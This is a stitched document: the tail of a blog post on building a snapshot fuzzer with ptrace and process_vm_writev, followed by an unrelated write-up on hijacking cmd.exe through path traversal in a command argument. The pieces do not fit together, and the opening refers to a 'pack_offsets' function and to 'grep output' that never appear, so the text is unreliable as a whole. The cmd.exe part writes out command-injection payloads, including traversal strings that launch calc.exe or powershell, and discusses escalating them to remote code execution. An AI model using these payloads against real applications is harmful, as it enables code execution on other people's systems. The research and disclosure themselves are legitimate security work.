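Fed the seven region lengths 0x1000, 0x2000, 0x4000, 0x2000, 0x1000, 0x1000 and 0x21000, pack_offsets reports a total of 0x2C000 bytes, which matches a snapshot buffer of that size.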

I would break on check_one and then open /proc/$pid/maps to get the offsets within the program that contain writable memory sections, and then I would open /proc/$pid/mem and read from those offsets into a buffer to store the writable memory. This code was stored in a source file called snapshot.c which contained some definitions and functions to both capture snapshots and restore them. For this part, capturing writable memory, I used the following definitions and function:

unsigned char* create_snapshot(pid_t child_pid) {
 
    struct SNAPSHOT_MEMORY read_memory = {
        {
            // maps_offset
            0x555555756000,
            0x7ffff7dcf000,
            0x7ffff7dd1000,
            0x7ffff7fe0000,
            0x7ffff7ffd000,
            0x7ffff7ffe000,
            0x7ffffffde000
        },
        {
            // snapshot_buf_offset
            0x0,
            0xFFF,
            0x2FFF,
            0x6FFF,
            0x8FFF,
            0x9FFF,
            0xAFFF
        },
        {
            // rdwr length
            0x1000,
            0x2000,
            0x4000,
            0x2000,
            0x1000,
            0x1000,
            0x21000
        }
    };  
 
    unsigned char* snapshot_buf = (unsigned char*)malloc(0x2C000);
 
    // this is just /proc/$pid/mem
    char proc_mem[0x20] = { 0 };
    sprintf(proc_mem, "/proc/%d/mem", child_pid);
 
    // open /proc/$pid/mem for reading
    // hardcoded offsets are from typical /proc/$pid/maps at main()
    int mem_fd = open(proc_mem, O_RDONLY);
    if (mem_fd == -1) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("open");
        exit(errno);
    }
 
    // this loop will:
    //  -- go to an offset within /proc/$pid/mem via lseek()
    //  -- read x-pages of memory from that offset into the snapshot buffer
    //  -- adjust the snapshot buffer offset so nothing is overwritten in it
    // lseek() returns off_t and read() returns ssize_t
    off_t lseek_result;
    ssize_t bytes_read;
    for (int i = 0; i < 7; i++) {
        //printf("dragonfly> Reading from offset: %d\n", i+1);
        lseek_result = lseek(mem_fd, read_memory.maps_offset[i], SEEK_SET);
        if (lseek_result == -1) {
            fprintf(stderr, "dragonfly> Error (%d) during ", errno);
            perror("lseek");
            exit(errno);
        }
 
        bytes_read = read(mem_fd,
            (unsigned char*)(snapshot_buf + read_memory.snapshot_buf_offset[i]),
            read_memory.rdwr_length[i]);
        if (bytes_read == -1) {
            fprintf(stderr, "dragonfly> Error (%d) during ", errno);
            perror("read");
            exit(errno);
        }
    }
 
    close(mem_fd);
    return snapshot_buf;
}

You can see that I hardcoded all the offsets and the lengths of the sections. Keep in mind, this doesn’t need to be fast. We’re only capturing a snapshot once, so it’s ok to interact with the file system. So we’ll loop through these 7 offsets and lengths and write them all into a buffer called snapshot_buf which will be stored in our fuzzer’s heap. So now we have both the register states and the memory states of our process as it begins check_one (our ‘start’ breakpoint).
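Hardcoding works for a POC, but the same table can be derived from /proc/$pid/maps itself. The following is a minimal sketch, not the code used by dragonfly: struct region, parse_maps_line() and layout_regions() are hypothetical names, and it assumes we want every rw mapping except [heap], laid out back to back in the snapshot buffer.

```c
#include <stdio.h>
#include <string.h>

#define MAX_REGIONS 16

/* hypothetical description of one snapshotted mapping */
struct region {
    unsigned long start;   /* address of the mapping in the debuggee */
    unsigned long length;  /* end - start */
    unsigned long buf_off; /* where this mapping lives in snapshot_buf */
};

/* Parse one line of /proc/$pid/maps. Returns 1 and fills *r if the line
 * describes a readable and writable mapping other than the heap,
 * returns 0 otherwise. */
int parse_maps_line(const char *line, struct region *r)
{
    unsigned long start, end;
    char perms[5];

    if (sscanf(line, "%lx-%lx %4s", &start, &end, perms) != 3)
        return 0;
    if (perms[0] != 'r' || perms[1] != 'w')
        return 0;
    if (strstr(line, "[heap]") != NULL)
        return 0;

    r->start = start;
    r->length = end - start;
    r->buf_off = 0;
    return 1;
}

/* Walk the lines, keep the mappings we care about and assign each one a
 * buffer offset equal to the running sum of the previous lengths.
 * Returns the total number of bytes the snapshot buffer needs. */
unsigned long layout_regions(const char *const *lines, int n_lines,
                             struct region *out, int *n_out)
{
    unsigned long total = 0;
    int count = 0;

    for (int i = 0; i < n_lines && count < MAX_REGIONS; i++) {
        if (parse_maps_line(lines[i], &out[count])) {
            out[count].buf_off = total;
            total += out[count].length;
            count++;
        }
    }
    *n_out = count;
    return total;
}
```

Fed the eight lines of grep output shown earlier, this yields seven regions and a total of 0x2C000 bytes, matching the malloc() above. Laid out back to back, the buffer offsets come to 0x0, 0x1000, 0x3000, 0x7000, 0x9000, 0xA000 and 0xB000. Note that the hardcoded table starts each region after the first one byte earlier (0xFFF, 0x2FFF, ...), so neighbouring regions overlap by a byte in snapshot_buf.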

Let’s now figure out how to restore the snapshot when we reach our ‘end’ breakpoint.

Restoring Snapshot

To restore the process memory state, we could just write to /proc/$pid/mem the same way we read from it; however, this portion needs to be fast since we are doing this every fuzzing iteration now. Interacting with the file system every fuzzing iteration will slow us down big time. Luckily, since Linux kernel version 3.2, there is support for a much faster, process-to-process, memory reading/writing API that we can leverage called process_vm_writev(). It is still a system call, but it copies data directly between the two processes’ address spaces without staging it in a kernel buffer and without involving the file system, so it will greatly increase our write speeds.

It’s kind of confusing looking at first, but the man page example is really all you need to understand how it works. I’ve opted to just hardcode all of the offsets since this fuzzer is simply a POC, and we can restore the writable memory as follows:

void restore_snapshot(unsigned char* snapshot_buf, pid_t child_pid) {
 
    ssize_t bytes_written = 0;
    // we're writing *from* 7 different offsets within snapshot_buf
    struct iovec local[7];
    // we're writing *to* 7 separate sections of writable memory here
    struct iovec remote[7];
 
    // these structs describe the local buffers we want to write from into
    // the 'remote' process (ie, the child process where we'll overwrite
    // all of the non-heap writable memory sections that we parsed from
    // /proc/$pid/maps)
    local[0].iov_base = snapshot_buf;
    local[0].iov_len = 0x1000;
    local[1].iov_base = (unsigned char*)(snapshot_buf + 0xFFF);
    local[1].iov_len = 0x2000;
    local[2].iov_base = (unsigned char*)(snapshot_buf + 0x2FFF);
    local[2].iov_len = 0x4000;
    local[3].iov_base = (unsigned char*)(snapshot_buf + 0x6FFF);
    local[3].iov_len = 0x2000;
    local[4].iov_base = (unsigned char*)(snapshot_buf + 0x8FFF);
    local[4].iov_len = 0x1000;
    local[5].iov_base = (unsigned char*)(snapshot_buf + 0x9FFF);
    local[5].iov_len = 0x1000;
    local[6].iov_base = (unsigned char*)(snapshot_buf + 0xAFFF);
    local[6].iov_len = 0x21000;
 
    // just hardcoding the base addresses that are writable memory
    // that we gleaned from /proc/pid/maps and their lengths
    remote[0].iov_base = (void*)0x555555756000;
    remote[0].iov_len = 0x1000;
    remote[1].iov_base = (void*)0x7ffff7dcf000;
    remote[1].iov_len = 0x2000;
    remote[2].iov_base = (void*)0x7ffff7dd1000;
    remote[2].iov_len = 0x4000;
    remote[3].iov_base = (void*)0x7ffff7fe0000;
    remote[3].iov_len = 0x2000;
    remote[4].iov_base = (void*)0x7ffff7ffd000;
    remote[4].iov_len = 0x1000;
    remote[5].iov_base = (void*)0x7ffff7ffe000;
    remote[5].iov_len = 0x1000;
    remote[6].iov_base = (void*)0x7ffffffde000;
    remote[6].iov_len = 0x21000;
 
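    bytes_written = process_vm_writev(child_pid, local, 7, remote, 7, 0);
    if (bytes_written == -1) {
        fprintf(stderr, "dragonfly> Error (%d) during ", errno);
        perror("process_vm_writev");
        exit(errno);
    }
    //printf("dragonfly> %ld bytes written\n", bytes_written);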
}

So for 7 different writable sections, we’ll write into the debuggee process at the offsets defined in /proc/$pid/maps from our snapshot_buf that has the pristine snapshot data. AND IT WILL BE FAST!
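The local and remote iovec arrays mirror each other, so they can also be filled in from a single table. This is a sketch under assumptions, not dragonfly's code: struct snap_region, build_iovecs() and restore_regions() are hypothetical names, and the snapshot buffer is assumed to hold the regions back to back in table order. Only process_vm_writev() and struct iovec come from the real API.

```c
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/uio.h>

#define MAX_SNAP_REGIONS 16

/* hypothetical table entry: where a region lives in the debuggee */
struct snap_region {
    unsigned long remote_addr;
    size_t length;
};

/* Fill local[i] with the slice of snapshot_buf that holds region i and
 * remote[i] with the matching address range in the debuggee.
 * Returns the total number of bytes described. */
size_t build_iovecs(unsigned char *snapshot_buf,
                    const struct snap_region *regions, int n,
                    struct iovec *local, struct iovec *remote)
{
    size_t off = 0;

    for (int i = 0; i < n; i++) {
        local[i].iov_base = snapshot_buf + off;
        local[i].iov_len = regions[i].length;
        remote[i].iov_base = (void *)regions[i].remote_addr;
        remote[i].iov_len = regions[i].length;
        off += regions[i].length;
    }
    return off;
}

/* Write the whole snapshot back with one process_vm_writev() call.
 * Returns 0 if every byte was written, -1 otherwise. */
int restore_regions(pid_t pid, unsigned char *snapshot_buf,
                    const struct snap_region *regions, int n)
{
    struct iovec local[MAX_SNAP_REGIONS];
    struct iovec remote[MAX_SNAP_REGIONS];

    if (n < 0 || n > MAX_SNAP_REGIONS)
        return -1;

    size_t total = build_iovecs(snapshot_buf, regions, n, local, remote);
    ssize_t written = process_vm_writev(pid, local, (unsigned long)n,
                                        remote, (unsigned long)n, 0);
    return (written >= 0 && (size_t)written == total) ? 0 : -1;
}
```

Comparing the return value against the expected total also catches partial writes, which process_vm_writev() can report when one of the remote ranges is not writable.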

So now that we have the ability to restore the writable memory, we only need to restore the register states to complete our rudimentary snapshot mechanism. That is easy using the functions defined in our ptrace_helpers, and you can see the two function calls within the fuzzing loop as follows:

// restore writable memory from /proc/$pid/maps to its state at Start
restore_snapshot(snapshot_buf, child_pid);

// restore registers to their state at Start
set_regs(child_pid, snapshot_registers);

So that’s how our snapshot process works and in my testing, we achieved about a 20-30x speed-up over the dumb fuzzer!

Making our Dumb Fuzzer Smart

At this point, we still have a dumb fuzzer (albeit much faster now). We need to be able to track code coverage. A very simple way to do this would be to place a breakpoint at every ‘basic block’ between check_one and exit so that if we reach new code, a breakpoint will be reached and we can do_something() there.

This is exactly what I did except, for simplicity’s sake, I just placed ‘dynamic’ (code coverage) breakpoints at the entry points to check_two and check_three. When a ‘dynamic’ breakpoint is reached, we save the input that reached the code into an array of char pointers called the ‘corpus’ and we can now start mutating those saved inputs instead of just our ‘prototype’ input of Canon_40D.jpg.

So our code coverage feedback mechanism will work like this:

1. Mutate prototype input and insert the fuzzcase into the heap
2. Resume debuggee
3. If ‘dynamic breakpoint’ reached, save input into corpus
4. If corpus > 0, randomly pick an input from the corpus or the prototype and repeat from step 1

We also have to remove the dynamic breakpoint so that we stop breaking on it. Good thing we already know how to do this well!
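The corpus bookkeeping from the steps above can be sketched as follows. This is an illustration, not the fuzzer's actual code: struct corpus, corpus_add() and corpus_pick() are hypothetical names, CORPUS_MAX is an arbitrary cap, and every input is assumed to have the same length as the prototype.

```c
#include <stdlib.h>
#include <string.h>

#define CORPUS_MAX 16 /* arbitrary cap for this sketch */

/* the 'corpus': an array of pointers to saved inputs */
struct corpus {
    unsigned char *inputs[CORPUS_MAX];
    size_t count;
};

/* Save a private copy of an input that reached a dynamic breakpoint.
 * Returns 0 on success, -1 if the corpus is full or malloc() fails. */
int corpus_add(struct corpus *c, const unsigned char *input, size_t len)
{
    if (c->count == CORPUS_MAX)
        return -1;

    unsigned char *copy = malloc(len);
    if (copy == NULL)
        return -1;

    memcpy(copy, input, len);
    c->inputs[c->count++] = copy;
    return 0;
}

/* Pick the next input to mutate: one of the saved inputs or the
 * prototype, each with equal probability. With an empty corpus this
 * always returns the prototype. */
const unsigned char *corpus_pick(const struct corpus *c,
                                 const unsigned char *prototype)
{
    size_t choice = (size_t)rand() % (c->count + 1);
    return (choice == c->count) ? prototype : c->inputs[choice];
}
```

In the fuzzing loop, corpus_add() would be called when a dynamic breakpoint is hit, and corpus_pick() at the top of each iteration before mutating.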

As you may remember from the last post, code coverage is crucial to our ability to crash this test binary vuln, as it performs 3 byte comparisons that all must pass before it crashes. We determined mathematically last post that our chances of passing the first check are about 1 in 13 thousand and our chances of passing the first two checks are about 1 in 170 million (roughly 13 thousand squared). Because we’re saving off input that passes check_one and mutating it further, the odds of getting past check_two improve from roughly 1 in 170 million to something close to the 1 in 13 thousand figure. The same applies to inputs that then pass check_two, and we can therefore reach and pass check_three with ease.

Running The Fuzzer

The first stage of our fuzzer, which collects snapshot data and sets ‘dynamic breakpoints’ for code coverage, completes very quickly even though it’s not meant to be fast. This is because all the values are hardcoded since our target is extremely simple. In a complex multi-threaded target we would need some way to script the discovery of dynamic breakpoint addresses via Ghidra or objdump or something, and we’d need to have that script write a configuration file for our fuzzer, but that’s far off. For now, for a POC, this works fine.

h0mbre@pwn:~/fuzzing/dragonfly_dir$ ./dragonfly 

dragonfly> debuggee pid: 12156
dragonfly> setting 'start/end' breakpoints:

   start-> 0x555555554b41
   end  -> 0x5555555548c0

dragonfly> set dynamic breakpoints: 

           0x555555554b7d
           0x555555554bb9

dragonfly> collecting snapshot data
dragonfly> snapshot collection complete
dragonfly> press any key to start fuzzing!

You can see that the fuzzer helpfully displays the ‘start’ and ‘end’ breakpoints as well as lists the ‘dynamic breakpoints’ for us so that we can check to see that they are correct before fuzzing. The fuzzer pauses and waits for us to press any key to start fuzzing. We can also see that the snapshot data collection has completed successfully so now we are broken on ‘start’ and have all the data we need to start fuzzing.

Once we press enter, we get a statistics output that shows us how the fuzzing is going:

dragonfly> stats (target:vuln, pid:12156)

fc/s       : 41720
crashes    : 5
iterations : 0.3m
coverage   : 2/2 (%100.00)

As you can see, it found both ‘dynamic breakpoints’ almost instantly and is currently running about 41k fuzzing iterations per second of CPU time (about 20-30x faster in wall time than our dumb fuzzer).

Most importantly, you can see that we were able to crash the binary 5 times already in just 300k iterations! We could’ve never done this with our previous fuzzer.

Conclusion

One of the biggest takeaways for me from doing this was just how much more performance you can squeeze out of a fuzzer if you just customize it for your target. Out of the box frameworks like AFL are great and incredibly impressive tools, and I hope this fuzzer will one day grow into something comparable. We were able to run about 20-30x faster than AFL for this really simple target and were able to crash it almost instantly with just a little bit of reverse engineering and customization. I thought this was really neat and instructive. In the future, when I adapt this fuzzer for a real target, I should be able to outperform frameworks again.

Ideas for Improvement

Where to begin? We have a lot of areas where we can improve but some immediate improvements that can be made are:

optimizing performance by refactoring code and changing the location of global variables
enabling the dynamic configuration of the fuzzer via a config file that can be created via a Python script
implementing more mutation methods
implementing more code coverage mechanisms
developing the fuzzer so that many instances can run in parallel and share discovered inputs/coverage data

Perhaps we will see these improvements in a subsequent post and the results of fuzzing a real target with the same general approach. Until then!

Code

All of the code for this blogpost can be found here: https://github.com/h0mbre/Fuzzing/tree/master/Caveman4

HACKINGISCOOL

Cmd Hijack - a command/argument confusion with path traversal in cmd.exe

By: Julian Horoszkiewicz

10 June 2020 at 05:43

This one is about an interesting behavior 🤭 I identified in cmd.exe as a result of many weeks of intermittent (private time, every now and then) research in pursuit of some new OS Command Injection attack vectors.

So I was mostly trying to:

find an encoding mismatch between some command check/sanitization code and the rest of the program, allowing one to smuggle the ASCII version of the existing command separators in the second byte of a wide char (for a moment I believed I had it in the StripQuotes function - I was wrong ¯\(ツ)/¯),
discover some hidden cmd.exe's counterpart of the unix shells' backtick operator,
find a command separator alternative to |, & and \n - which long ago resulted in the discovery of an interesting and still alive, but very rarely occurring vulnerability - https://vuldb.com/?id.93602.

And I eventually ended up finding a command/argument confusion with path traversal ... or whatever the fuck this is 😃

For the lazy with no patience to read the whole thing, here comes the magic trick:

Tested on Windows 10 Pro x64 (Microsoft Windows [Version 10.0.18363.836]), cmd.exe version: 10.0.18362.449 (SHA256: FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5). But should work with earlier versions as well... probably with all versions.

Some more context

Let's consider the following command line: cmd.exe /c "ping 127.0.0.1",
where 127.0.0.1 is the argument controlled by the user in an application that runs an external command (in this sample case it's ping). This exact syntax - with the command being preceded with the /c switch and enclosed in double quotes - is the default way cmd.exe is used by external programs to execute system commands (e.g. PHP shell_exec() function and its variants).

Now, the user can trick cmd.exe into running calc.exe instead of ping.exe by providing an argument like 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe, traversing the path to the executable of their choice, which cmd.exe will run instead of the ping.exe binary.

So the full command line becomes:

cmd.exe /c "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe"

The potential impact of this includes Denial of Service, Information Disclosure, Arbitrary Code Execution (depending on the target application and system).

Although I am fairly sure there are other scenarios with OS command execution where a part of the command line comes from a different security context than the one the final command is executed with (Some services maybe? I haven't searched myself yet), let's use a web application as an example.

Consider the following sample PHP code:

Due to the use of escapeshellcmd() it is not vulnerable to known command injection vectors (except for argument injection, but that's a slightly different story and does not allow RCE with the list of arguments ping.exe supports - no built-in execution arguments like find's -exec).

And I know, I know, some of you will point out that in this case escapeshellarg() should be used instead - and yup, you would be right, especially since putting the argument in quotes in fact prevents this behavior, as in such case cmd.exe properly identifies the command to run (ping.exe). The trick does not work when the argument is enclosed in single/double quotes.

Anyway - the use of escapeshellcmd() instead of escapeshellarg() is very common. I noticed that when, after finding and registering CVE-2020-12669, CVE-2020-12742 and CVE-2020-12743, I ended up spending one more week running automated source code analysis scans against more open source projects and manually following up the results, using my old evil SCA tool for PHP. That's also what made me fed up with PHP again quite quickly, forcing me to get back to cmd.exe, only to finally discover what this blog post is mostly about.

I am fairly sure there are applications vulnerable to this (doing OS command injection sanity checks, but failing to prevent path traversal and enclose the argument in quotes).
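The kind of check that would stop the traversal can be sketched like this. It is written in C rather than PHP, is_plain_host() is a hypothetical helper, and it assumes the argument is meant to be a bare hostname or IPv4 address, so anything containing a path separator, a space, a quote or a leading dash is rejected outright.

```c
#include <ctype.h>
#include <stddef.h>

/* Return 1 if arg consists only of letters, digits, '.' and '-' and
 * does not start with '-'; return 0 otherwise. This rejects '/', '\\',
 * spaces and quotes, so a traversal such as
 * 127.0.0.1/../../windows/system32/calc.exe never reaches cmd.exe. */
int is_plain_host(const char *arg)
{
    if (arg == NULL || arg[0] == '\0' || arg[0] == '-')
        return 0;

    for (const unsigned char *p = (const unsigned char *)arg; *p != '\0'; p++) {
        if (!isalnum(*p) && *p != '.' && *p != '-')
            return 0;
    }
    return 1;
}
```

An allow-list like this is stricter than escaping. It does not try to make the argument safe, it only refuses anything that is not obviously a host.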

The notion of similar behavior in other command interpreters is also worth entertaining.

An extended POC

Normal use:

Abuse:

Now, this is what normal use looks like in Sysmon log (process creation event):

So basically the child process (ping.exe) is created with command line equal to the value enclosed between the double quotes preceded by the /c switch from the parent process (cmd.exe) command line.

Now, the same for the above ipconfig.exe hijack:

And it turns out we are not limited to executables located in directories present in %PATH%. We can traverse to any location on the same disk.

Also, we are not limited to the EXE extension, nor to the list of "executable" extensions contained in the %PATHEXT% variable (which by default is .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC - basically these are the extensions cmd.exe will try to add to the name of the command if no extension is provided, e.g. when ping is used instead of explicit ping.exe). cmd.exe runs stuff regardless of the extension, something I noticed long ago (https://twitter.com/julianpentest/status/1203386223227572224).
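To make the %PATHEXT% part concrete, here is a small sketch of how candidate file names can be derived from a bare command name. It only illustrates the idea of appending each extension in turn; pathext_candidate() is a hypothetical helper and this is not cmd.exe's actual code.

```c
#include <stdio.h>
#include <string.h>

/* Build the idx-th candidate name by appending the idx-th entry of a
 * ';'-separated PATHEXT string to name. Returns 1 and fills out on
 * success, 0 if idx is past the last entry or out is too small. */
int pathext_candidate(const char *name, const char *pathext, int idx,
                      char *out, size_t cap)
{
    const char *p = pathext;

    /* skip idx entries */
    for (int i = 0; i < idx; i++) {
        p = strchr(p, ';');
        if (p == NULL)
            return 0;
        p++;
    }

    size_t ext_len = strcspn(p, ";");
    if (ext_len == 0)
        return 0;

    int n = snprintf(out, cap, "%s%.*s", name, (int)ext_len, p);
    return n >= 0 && (size_t)n < cap;
}
```

Calling it with "ping" and increasing idx values walks through ping.COM, ping.EXE, ping.BAT and so on, until it returns 0 at the end of the list.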

And one more thing - additional arguments can be added between the original command and the smuggled executable path.

Let's see all of this combined.

For demonstration purposes, the following C program was compiled and linked into a PE executable (it simply prints out its own command line):

Copied the EXE into C:\xampp\tmp\cmd.png (consider this as an example of ANY location a malicious user could write a file).

Action:

So we just effectively achieved an equivalent of actual (exec, not just read) PE Local File Inclusion in an otherwise-safe PHP ping script.

But I don't think that our options end here.

The potential for extending this into a full RCE without chaining with file upload/control

I am certain it is also possible to turn this into an RCE even without the possibility of fully/partially controlling any file in the target file system and deliver the payload in the command line itself, thus creating a sort of polymorphic malicious command line payload.

When running the target executable, cmd.exe passes to it the entire part of the command line following the /c switch.

For instance:

cmd.exe /c "ping 127.0.0.1/../../../../../../../windows/system32/calc.exe"

executes c:\windows\system32\calc.exe with the command line equal to ping 127.0.0.1/../../../../../../../windows/system32/calc.exe.

And, as presented in the extended POC, it is possible to hijack the executable even when providing multiple arguments, leading to command lines like:

ping THE PLACE FOR THE RCE PAYLOAD ARGS 127.0.0.1/../../path/to/lol.bin

This is the command line lol.bin would be executed with. Finding a proxy execution LOLBin tolerant enough to invalid arguments (since we as attackers cannot fully control them) could turn this into a full RCE.
The LOLBin we need is one accepting/ignoring the first argument (which is the hardcoded command we cannot control, in our example "ping"), while also willing to accept/ignore the last one (which is the traversed path to itself). Something like https://lolbas-project.github.io/lolbas/Binaries/Ieexec/, but actually accepting multiple arguments while quietly ignoring the incorrect ones.

Also, I was thinking of powershell.

Running this:

cmd.exe /c "ping ;calc.exe; 127.0.0.1/../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/POWERSHELL.EXE"

makes powershell start with command line of

ping ;calc.exe 127.0.0.1/../../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/POWERSHELL.EXE

I expected it to treat the command line as a string of inline commands and run calc.exe after running ping.exe. Yes, I know, a semicolon is used here to separate ping from calc - but the semicolon character is NOT a command separator in cmd.exe, while it is in powershell (on the other hand almost all OS Command Injection filters block it anyway, as they are written universally with multiple platforms in mind - cause obviously the semicolon IS a command separator in unix shells).

An ideal syntax here would be some sort of simple base64-encoded code injection like powershell's -EncodedCommand, provided we found a way to make it work even when preceded with a string we cannot control. Anyway, this attempt led to powershell running in interactive mode instead of treating the command line as a sequence of inline commands to execute.

Anyway, at this point turning this into an RCE boils down to researching the behaviors of particular LOLbins, focusing on the way they process their command line, rather than researching cmd.exe itself (although yes, I also thought about self-chaining and abusing cmd.exe as the LOLbin for this, in hope for taking advantage of some nuances between the way it parses its command line when it does and when it does not start with the /c switch).

Stumbling upon and some analysis

I know this looks silly enough to suggest I found it while ramming that sample PHP code over HTTP with Burp while watching Procmon with proper filters... or something like that (which isn't such a bad idea by the way)... as opposed to writing a custom cmd.exe fuzzer (no, you don't need to tell me my code is far away from elegant, I did not expect anyone would read it nor that I would reuse it), then after obtaining rather boring and disappointing results, spending weeks on static analysis with Ghidra (thanks NSA, I am literally in love with this tool), followed up with more weeks of further work with Ghidra while simultaneously manually debugging with x64dbg while further expanding comments in the Ghidra project 😂

cmd.exe command line processing starts in the CheckSwitches function (which gets called from Init, which itself gets called from main). CheckSwitches is responsible for determining what switches (like /c, /k, /v:on etc.) cmd.exe was called with. The full list of options can be found in cmd.exe /? help (which by the way, to my surprise, reflects the actual functionality pretty well).

I spent a good deal of time analyzing it carefully, looking for hidden switches, logic issues allowing to smuggle multiple switches via the command line by jumping out of the double quotes, quote-stripping issues and whatever else would just manifest to me as I dug in.

The beginning of the CheckSwitches function after some naming edits and notes I took

If the /c switch is detected, processing moves to the actual command line enclosed in double quotes - which is the most common mode cmd.exe is used in and the only one the rest of this write-up is about:

The same mode can be attained with the /r switch:

After some further logic, which among other things parses the quoted string and makes some sanity fixes (like removing any leading spaces), a function with a very encouraging and self-explanatory name is called:

Disassembly view:

Decompiler view:

At this point it was clear it was high time for debugging to come into play.

By default x64dbg will set up a breakpoint at the entry point - mainCRTStartup.

This is a good opportunity to set an arbitrary command line:

Then start cmd.exe once again (Debug-> Restart).

We also set up a breakpoint on the top of the SearchForExecutable function, so we catch all its instances.

We run into the first instance of SearchForExecutable:

We can see that the double-quoted proper command line (after cmd.exe skips the preceding cmd.exe /c) along with its double quotes is held in RBX and R15. Also, the value on the top of the stack (right bottom corner) contains an address pointing at CheckSwitches - it's the saved RET. So we know this instance is called from CheckSwitches.

If we hit F9 again, we will run into the second instance of SearchForExecutable, but this time the command line string is held in RAX, RDI and R11, while the call originates from another function named ECWork:

This second instance resolves and returns the full path to ping.exe.

Below we can see the body of the ECWork function, with a call to SearchForExecutable (marked black). This is where RIP was when the screenshot was taken - right before the second call of SearchForExecutable:

Now, in the screenshot below, the SearchForExecutable call has already returned (note the full path to ping.exe pointed at by the address held in R14). Fifteen instructions later the ExecPgm function is called, using the newly resolved executable path to create the new process:

So - seeing SearchForExecutable being called against the whole ping 127.0.0.1 string (uh yeah, those evil spaces) suggests potential confusion between the full command line and an actual file name... So this gave me the initial idea to check whether the executable could be hijacked by literally creating one under a name equal to the command line that would make it run:

Uh really? Interesting. I decided to have a look with Procmon in order to see what file names cmd.exe attempts to open with CreateFile:

So yes, the result confirmed opening a copy of calc.exe from the file literally named ping .PNG in the current working directory:

Now, interestingly, I would not see any results with this Procmon filter (Operation = CreateFile) if I did not create the file first...

One would expect to see cmd.exe mindlessly calling CreateFile against nonexistent files with names being various mutations of the command line, with NAME NOT FOUND result - the usual way one would search for potential DLL side loading issues... But NOT in this case - cmd.exe actually checks whether such file exists before calling CreateFile, by calling QueryDirectory instead:

For this purpose, in Procmon, it is more accurate to specify a filter based on the payload's unique magic string (like PNG in this case, as this would be the string we as attackers could potentially control) occurring in the Path property instead of filtering based on the Operation.

"So, anyway, this isn't very useful" - I thought and got back to x64dbg.

"We can only hijack the command if we can literally write a file under a very dodgy name into the target application's current directory... " - I kept thinking - "... Current directory... u sure ONLY current directory?" - and at this point my path traversal reflex lit up, a seemingly crazy and desperate idea to attempt traversal payloads against parts of the command line parsed by SearchForExecutable.

Which made me manually change the command line to ping 127.0.0.1/../calc.exe and restart debugging... while already thinking of modifying the cmd.exe fuzzer in order to throw a set of payloads generated for this purpose with psychoPATH against cmd.exe... But that never happened because of what I saw after I hit F9 one more time.

Below we can see x64dbg with cmd.exe run with the cmd.exe /c "ping 127.0.0.1/../calc.exe" command line (see RDI). We are paused right after the second SearchForExecutable call, the one originating from the bottom of the ECWork function, just a few instructions before calling ExecPgm, which is about to execute the PE pointed to by R14. The full path to C:\Windows\System32\calc.exe present in R14 is the result of the just-returned SearchForExecutable("ping 127.0.0.1/../calc.exe") call preceding the current RIP:

The traversal appears to be relative to a subdirectory of the current working directory (calc.exe is at c:\windows\system32\calc.exe):

"Or maybe this is just a result of a failed path traversal sanity check, only removing the first occurrence of ../?" - I kept wondering.

So I dug further into the SearchForExecutable function, also trying to find the answer why variants of the argument created by splitting it by spaces are considered and why the most-to-the-right one is chosen first when found.

I narrowed down the culprit code to the instructions within the SearchForExecutable function, between the call of mystrcspn at 14000ff64 and then the call of the FullPath function at 14001005b and exists_ex at 140010414:

In the meantime I received the following feedback from Microsoft:

We do have a blog post that helps describe the behavior you have documented: https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats.

Cmd.exe first tries to interpret the whole string as a path: "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe” string is being treated as a relative path, so “ping 127.0.0.1” is interpreted as a segment in that path, and is removed due to the preceding “../” this should help explain why you shouldn’t be able to use the user controlled input string to pass arguments to the executable.

There are a lot a cases that would require that behaviour, e.g. cmd.exe /c "....\Program Files (x86)\Internet Explorer\iexplore.exe" we wouldn’t want that to try to run some program “....\Program” with the argument “Files (x86)\Internet Explorer\iexplore.exe”.

It’s only if the full string can’t be resolved to a valid path, that it splits on spaces and takes everything before the first space as the intended executable name (hence why “ping 127.0.0.1” does work).

So yeah... those evil spaces and quoting.
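The first step Microsoft describes, treating the whole string as a relative path, can be illustrated with a purely lexical normalization. This is a sketch of the general idea only, not cmd.exe's code: resolve_path() is a hypothetical helper, the working directory C:\xampp\htdocs used in the usage note is an assumed example, and real Windows path handling has many more rules than this.

```c
#include <stdio.h>
#include <string.h>

#define MAX_SEGMENTS 128

/* Lexically resolve rel against cwd (for example "C:\\xampp\\htdocs").
 * Both '/' and '\\' are treated as separators, "." is skipped and ".."
 * removes the previous segment, but never the drive itself.
 * Returns 0 on success, -1 if something does not fit. */
int resolve_path(const char *cwd, const char *rel, char *out, size_t cap)
{
    char work[1024];
    const char *segs[MAX_SEGMENTS];
    int depth = 0;

    if (cap == 0)
        return -1;

    int n = snprintf(work, sizeof work, "%s/%s", cwd, rel);
    if (n < 0 || (size_t)n >= sizeof work)
        return -1;

    /* note that a space is NOT a separator, so "ping 127.0.0.1" is
     * just one (odd looking) path segment */
    for (char *tok = strtok(work, "/\\"); tok != NULL; tok = strtok(NULL, "/\\")) {
        if (strcmp(tok, ".") == 0)
            continue;
        if (strcmp(tok, "..") == 0) {
            if (depth > 1)
                depth--;
            continue;
        }
        if (depth == MAX_SEGMENTS)
            return -1;
        segs[depth++] = tok;
    }

    size_t used = 0;
    out[0] = '\0';
    for (int i = 0; i < depth; i++) {
        n = snprintf(out + used, cap - used, "%s%s", i ? "\\" : "", segs[i]);
        if (n < 0 || (size_t)n >= cap - used)
            return -1;
        used += (size_t)n;
    }
    return 0;
}
```

With the assumed working directory, "ping 127.0.0.1/../calc.exe" collapses to C:\xampp\htdocs\calc.exe: the "ping 127.0.0.1" segment is consumed by the first "..". Adding enough "../" segments climbs to the drive root, after which the rest of the string selects any file on that disk.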

From this point, I only escalated the issue by confirming the possibility of traversing to arbitrary directories as well as the ability to force execution of PE files with arbitrary extensions.

Interestingly, this slightly resembles the common unquoted service path issue, except that in this case the most-to-the-right variant gets prioritized.

The disclosure

Upon discovery I documented and reported this peculiarity to MSRC. After a little less than six days the report was picked up and reviewed. About a week later Microsoft completed their assessment, concluding that this does not meet the bar for security servicing:

